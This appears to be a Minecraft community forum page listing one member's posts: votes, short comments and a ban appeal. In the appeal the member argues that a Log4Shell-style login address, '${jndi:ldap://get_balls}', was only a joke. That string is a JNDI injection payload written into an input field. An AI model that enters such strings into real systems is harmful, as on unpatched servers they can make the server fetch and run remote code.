Posts by eva
-
-
Congrats to both of you guys.
-
I like this idea, vouch.
-
Neutral for various reasons.
-
Hey guys, I'm making this forum post to address an issue with my ban. On the 9th of October 2022 I was banned from the network for joining with made-up login addresses back in April of this year, roughly a week later I found out that I was banned with a duration of 6 months and was told that there was 4 months for "attempting a log4j exploit" and 2 months for the made-up domains.
What was the attempted log4j "exploit" in question you may ask? Simple, when I was joining with made-up login addresses I joined with an address to reference and joke about log4shell, I used the following address "${jndi:ldap://get_balls}" (screenshot of the address before I connected https://cdn.discordapp.com/att…8642878820412/unknown.png) for the joke, now this is where the issue comes in with this part of my ban. I connected with this address on the 12/13th of April 2022 (Same dates I was joining with made-up addresses) and the log4shell CVE was discovered and reported to Apache on the 24th of November 2021 and patched on the 9th of December 2021 (5 months before I connected with made-up addresses) which means that by this date it was patched and is no longer a CVE or exploit, eitherway it would've caused no harm or disruption to the server as this had been patched well before and I'd also like to mention the "get_balls" section in this address which is in the place of an IP address which was the most common method used to link classes in the period this CVE was active for, I'm a Java programmer and I am well aware and familiar with how Log4J works and this would've caused no issues eitherway as it is not even leading to a valid location to a class that includes malicious code, not even a class which would have not done anything or any sort of stuff that would cause the server harm, this CVE was patched 5 months prior to me joining with this address and it was also very likely that the server updated to the patched versions of the libraries and running up-to-date Java versions which fix issues like these for security concerns, At the end of the day this was all meant to be an innocent joke but I think it has been interpreted wrong as me trying to cause harm or ill intent to the server rather than a silly joke address, I had no intentions or never will have intentions of trying to cause disruptions to the operation of the server and I probably should have notified staff about this and shouldn't have been joining with fake addresses anyway.
Anyways with all that being said i'd like for this issue to be looked into and hopefully to get the additional 4 month duration removed from the 6 months. I'm still willing to still serve the initial two months for connecting with the made-up login addresses when I shouldn't have and I have no issues with that other than the 4 additional months which the reasoning for doesn't satisfy me to be worthy of having such duration added on.
Anyways this is all I have to say and I will see you guys later,
Eva
-
the internet.
-
Object, I have always been against IPs being public. While a lot of people don't care about thir IPs being pubicly shown, other big servers don't go off showing their player's IPs, If they did they would lose all their players which this policy in the past probably has cost the server some players,
Even though this is still an issue I don't think we should be using IPs as an excuse to why they can't be publicized again, the community should be able to see IBRs again since we can't really trust them being private anymore and it's doing more destruction rather than good.
-
Vouch since I also think three months is a bit long.
-
Vouch.
-
Vouch, i don't think keeping them private anymore is doing any good.
-
I don't see why you'd want to change your name that often though, I haven't really had any issues with the limit since I don't usually change my name on the forum.
-
That's covered in his indef ban thread. That's all that for this thread.
We can't even see it because the indef ban request board is restricted to admins.
May you please repost it here so us operators can see it?
Vouch
-
Just as an update, I've identified the individual who I believe has caused this, and further investigation is ongoing in that regard.
I have also now been able to work through all of the changes that were made to the Bungee itself and think I've repaired any damage that was caused. I'm currently working through updating plugins and the bungee itself before that comes back online.
The Minecraft servers themselves are going to require a bit more work as some were seriously damaged as a result of this incident, I'm hoping to get some basic functionality up and running later today.
That’s good.
-
-
-
Object, clearly you need more time to think about what you did.
-
I am genuinely saddened, one of the best content creators I've ever seen.
-
This is one of the most cringiest things I've seen in this past month, crypto is already a dumpster fire anyway with the NFTs and bullshit and this seems like a major waste of time for a joke coin.
-
-
Aucun commentaire.
